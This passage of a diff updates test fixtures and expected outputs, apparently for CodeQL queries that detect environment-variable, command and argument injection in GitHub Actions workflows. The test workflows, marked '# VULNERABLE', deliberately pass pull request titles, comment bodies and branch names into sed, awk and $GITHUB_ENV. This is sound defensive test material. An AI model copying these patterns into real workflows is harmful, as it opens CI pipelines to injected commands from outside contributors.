--no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test16.yml:15:14:17:63 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | .github/workflows/test16.yml:10:9:15:6 | Uses Step | .github/workflows/test16.yml:15:14:17:63 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test16.yml:15:14:17:63 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | .github/workflows/test16.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/test16.yml:18:14:20:77 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | .github/workflows/test16.yml:10:9:15:6 | Uses Step | .github/workflows/test16.yml:18:14:20:77 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test16.yml:18:14:20:77 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | .github/workflows/test16.yml:4:3:4:14 | workflow_run | workflow_run | diff --git a/actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.qlref b/actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.qlref index b3f6c4bf7822..450079a19f67 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.qlref +++ b/actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.qlref @@ -1 +1,2 @@ -Security/CWE-077/EnvVarInjectionCritical.ql +query: Security/CWE-077/EnvVarInjectionCritical.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected b/actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected index 94e2af8ecaa7..b751cd05888c 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected +++ b/actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected @@ -1,3 +1,4 @@ +#select edges | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | provenance | Config | | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | Config | @@ -92,4 +93,3 @@ nodes | .github/workflows/test16.yml:15:14:17:63 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | semmle.label | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | | .github/workflows/test16.yml:18:14:20:77 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | semmle.label | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | subpaths -#select diff --git a/actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.qlref b/actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.qlref index fc6a3a80c984..cfc44d8a86df 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.qlref +++ b/actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.qlref @@ -1 +1,2 @@ -Security/CWE-077/EnvVarInjectionMedium.ql +query: Security/CWE-077/EnvVarInjectionMedium.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/actions/ql/test/query-tests/Security/CWE-078/.github/workflows/comment_issue.yml b/actions/ql/test/query-tests/Security/CWE-078/.github/workflows/comment_issue.yml index 4b6888449c00..b7968c4f7a62 100644 --- a/actions/ql/test/query-tests/Security/CWE-078/.github/workflows/comment_issue.yml +++ b/actions/ql/test/query-tests/Security/CWE-078/.github/workflows/comment_issue.yml @@ -6,4 +6,4 @@ jobs: steps: - uses: ruby/setup-ruby@v2 with: - ruby-version: ${{ github.event.comment.body }} + ruby-version: ${{ github.event.comment.body }} # $ Alert[actions/command-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.expected b/actions/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.expected index 281fd39552a7..7e3d87977b1f 100644 --- a/actions/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.expected +++ b/actions/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.expected @@ -1,6 +1,6 @@ +#select +| .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | Potential command injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | issue_comment | edges nodes | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | semmle.label | github.event.comment.body | subpaths -#select -| .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | Potential command injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | issue_comment | diff --git a/actions/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.qlref b/actions/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.qlref index 7057e60695b8..3dc57e81d632 100644 --- a/actions/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.qlref +++ b/actions/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.qlref @@ -1 +1,2 @@ -experimental/Security/CWE-078/CommandInjectionCritical.ql +query: experimental/Security/CWE-078/CommandInjectionCritical.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/actions/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.expected b/actions/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.expected index 99ebb1edc05d..be81405805bc 100644 --- a/actions/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.expected +++ b/actions/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.expected @@ -1,5 +1,5 @@ +#select edges nodes | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | semmle.label | github.event.comment.body | subpaths -#select diff --git a/actions/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.qlref b/actions/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.qlref index 9fbbb302a175..41310436d7e3 100644 --- a/actions/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.qlref +++ b/actions/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.qlref @@ -1 +1,2 @@ -experimental/Security/CWE-078/CommandInjectionMedium.ql +query: experimental/Security/CWE-078/CommandInjectionMedium.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/actions/ql/test/query-tests/Security/CWE-088/.github/workflows/arg_injection.yml b/actions/ql/test/query-tests/Security/CWE-088/.github/workflows/arg_injection.yml index 5d841e50dbb4..2566f6cc674b 100644 --- a/actions/ql/test/query-tests/Security/CWE-088/.github/workflows/arg_injection.yml +++ b/actions/ql/test/query-tests/Security/CWE-088/.github/workflows/arg_injection.yml @@ -7,7 +7,7 @@ jobs: test1: runs-on: ubuntu-latest env: - TITLE: ${{github.event.pull_request.title}} + TITLE: ${{github.event.pull_request.title}} # $ Source[actions/argument-injection/critical] steps: - name: Checkout uses: actions/checkout@v4 @@ -18,50 +18,50 @@ jobs: echo "s/FOO/$TITLE/g" - run: | # VULNERABLE - sed "s/FOO/$TITLE/g" + sed "s/FOO/$TITLE/g" # $ Alert[actions/argument-injection/critical] - run: | # VULNERABLE - echo "foo" | sed "s/FOO/$TITLE/g" > bar + echo "foo" | sed "s/FOO/$TITLE/g" > bar # $ Alert[actions/argument-injection/critical] - run: | # VULNERABLE - echo $(echo "foo" | sed "s/FOO/$TITLE/g" > bar) + echo $(echo "foo" | sed "s/FOO/$TITLE/g" > bar) # $ Alert[actions/argument-injection/critical] - run: | # VULNERABLE - awk "BEGIN {$TITLE}" + awk "BEGIN {$TITLE}" # $ Alert[actions/argument-injection/critical] - run: | # VULNERABLE - sed -i "s/git_branch = .*/git_branch = \"$GITHUB_HEAD_REF\"/" config.json + sed -i "s/git_branch = .*/git_branch = \"$GITHUB_HEAD_REF\"/" config.json # $ Alert[actions/argument-injection/critical] - run: | # VULNERABLE - sed -i "s|git_branch = .*|git_branch = \"$GITHUB_HEAD_REF\"|" config.json + sed -i "s|git_branch = .*|git_branch = \"$GITHUB_HEAD_REF\"|" config.json # $ Alert[actions/argument-injection/critical] - run: | # VULNERABLE sed -e 's##${TITLE}#' \ -e 's##${{ env.sot_repo }}#' \ -e 's##TITLE#' \ - .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky + .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky # $ Alert[actions/argument-injection/critical] - run: | # VULNERABLE sed -e 's##TITLE#' \ -e 's##${{ env.sot_repo }}#' \ -e 's##${TITLE}#' \ - .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky + .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky # $ Alert[actions/argument-injection/critical] - run: | # VULNERABLE BODY=$(git log --format=%s) - sed "s/FOO/$BODY/g" > /tmp/foo + sed "s/FOO/$BODY/g" > /tmp/foo # $ Alert[actions/argument-injection/critical] - run: | # VULNERABLE BODY=$(git diff --name-only HEAD) - sed "s/FOO/$BODY/g" > /tmp/foo + sed "s/FOO/$BODY/g" > /tmp/foo # $ Alert[actions/argument-injection/critical] - run: | # VULNERABLE BODY=$(git diff --name-only HEAD ) - sed "s/FOO/$BODY/g" > /tmp/foo + sed "s/FOO/$BODY/g" > /tmp/foo # $ Alert[actions/argument-injection/critical] - run: | # VULNERABLE BODY=$(git diff --name-only HEAD^ | xargs) - sed "s/FOO/$BODY/g" > /tmp/foo + sed "s/FOO/$BODY/g" > /tmp/foo # $ Alert[actions/argument-injection/critical] - run: | # NOT VULNERABLE echo "value=$(git log -1 --pretty=%s)" >> $GITHUB_OUTPUT diff --git a/actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.expected b/actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.expected index 5eddb791ae5c..4f4d67c2325c 100644 --- a/actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.expected +++ b/actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.expected @@ -1,3 +1,16 @@ +#select +| .github/workflows/arg_injection.yml:19:14:21:31 | # VULNERABLE\nsed "s/FOO/$TITLE/g"\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:19:14:21:31 | # VULNERABLE\nsed "s/FOO/$TITLE/g"\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:19:14:21:31 | # VULNERABLE\nsed "s/FOO/$TITLE/g"\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/arg_injection.yml:22:14:24:50 | # VULNERABLE\necho "foo" \| sed "s/FOO/$TITLE/g" > bar\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:22:14:24:50 | # VULNERABLE\necho "foo" \| sed "s/FOO/$TITLE/g" > bar\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:22:14:24:50 | # VULNERABLE\necho "foo" \| sed "s/FOO/$TITLE/g" > bar\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/arg_injection.yml:25:14:27:58 | # VULNERABLE\necho $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar)\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:25:14:27:58 | # VULNERABLE\necho $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar)\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:25:14:27:58 | # VULNERABLE\necho $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar)\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/arg_injection.yml:28:14:30:31 | # VULNERABLE\nawk "BEGIN {$TITLE}"\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:28:14:30:31 | # VULNERABLE\nawk "BEGIN {$TITLE}"\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:28:14:30:31 | # VULNERABLE\nawk "BEGIN {$TITLE}"\n | awk | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/arg_injection.yml:31:14:33:84 | # VULNERABLE\nsed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json\n | .github/workflows/arg_injection.yml:31:14:33:84 | # VULNERABLE\nsed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json\n | .github/workflows/arg_injection.yml:31:14:33:84 | # VULNERABLE\nsed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:31:14:33:84 | # VULNERABLE\nsed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/arg_injection.yml:34:14:36:84 | # VULNERABLE\nsed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | .github/workflows/arg_injection.yml:34:14:36:84 | # VULNERABLE\nsed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | .github/workflows/arg_injection.yml:34:14:36:84 | # VULNERABLE\nsed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:34:14:36:84 | # VULNERABLE\nsed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/arg_injection.yml:37:14:42:111 | # VULNERABLE\nsed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:37:14:42:111 | # VULNERABLE\nsed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:37:14:42:111 | # VULNERABLE\nsed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/arg_injection.yml:43:14:48:111 | # VULNERABLE\nsed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:43:14:48:111 | # VULNERABLE\nsed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:43:14:48:111 | # VULNERABLE\nsed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/arg_injection.yml:49:14:52:41 | # VULNERABLE\nBODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:49:14:52:41 | # VULNERABLE\nBODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:49:14:52:41 | # VULNERABLE\nBODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:49:14:52:41 | # VULNERABLE\nBODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/arg_injection.yml:53:14:56:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:53:14:56:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:53:14:56:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:53:14:56:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/arg_injection.yml:57:14:60:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:57:14:60:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:57:14:60:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:57:14:60:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/arg_injection.yml:61:14:64:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:61:14:64:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:61:14:64:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:61:14:64:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | edges | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:19:14:21:31 | # VULNERABLE\nsed "s/FOO/$TITLE/g"\n | provenance | Config | | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:22:14:24:50 | # VULNERABLE\necho "foo" \| sed "s/FOO/$TITLE/g" > bar\n | provenance | Config | @@ -20,16 +33,3 @@ nodes | .github/workflows/arg_injection.yml:57:14:60:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | semmle.label | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | | .github/workflows/arg_injection.yml:61:14:64:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | semmle.label | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | subpaths -#select -| .github/workflows/arg_injection.yml:19:14:21:31 | # VULNERABLE\nsed "s/FOO/$TITLE/g"\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:19:14:21:31 | # VULNERABLE\nsed "s/FOO/$TITLE/g"\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:19:14:21:31 | # VULNERABLE\nsed "s/FOO/$TITLE/g"\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/arg_injection.yml:22:14:24:50 | # VULNERABLE\necho "foo" \| sed "s/FOO/$TITLE/g" > bar\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:22:14:24:50 | # VULNERABLE\necho "foo" \| sed "s/FOO/$TITLE/g" > bar\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:22:14:24:50 | # VULNERABLE\necho "foo" \| sed "s/FOO/$TITLE/g" > bar\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/arg_injection.yml:25:14:27:58 | # VULNERABLE\necho $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar)\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:25:14:27:58 | # VULNERABLE\necho $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar)\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:25:14:27:58 | # VULNERABLE\necho $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar)\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/arg_injection.yml:28:14:30:31 | # VULNERABLE\nawk "BEGIN {$TITLE}"\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:28:14:30:31 | # VULNERABLE\nawk "BEGIN {$TITLE}"\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:28:14:30:31 | # VULNERABLE\nawk "BEGIN {$TITLE}"\n | awk | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/arg_injection.yml:31:14:33:84 | # VULNERABLE\nsed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json\n | .github/workflows/arg_injection.yml:31:14:33:84 | # VULNERABLE\nsed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json\n | .github/workflows/arg_injection.yml:31:14:33:84 | # VULNERABLE\nsed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:31:14:33:84 | # VULNERABLE\nsed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/arg_injection.yml:34:14:36:84 | # VULNERABLE\nsed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | .github/workflows/arg_injection.yml:34:14:36:84 | # VULNERABLE\nsed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | .github/workflows/arg_injection.yml:34:14:36:84 | # VULNERABLE\nsed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:34:14:36:84 | # VULNERABLE\nsed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/arg_injection.yml:37:14:42:111 | # VULNERABLE\nsed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:37:14:42:111 | # VULNERABLE\nsed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:37:14:42:111 | # VULNERABLE\nsed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/arg_injection.yml:43:14:48:111 | # VULNERABLE\nsed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:43:14:48:111 | # VULNERABLE\nsed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > 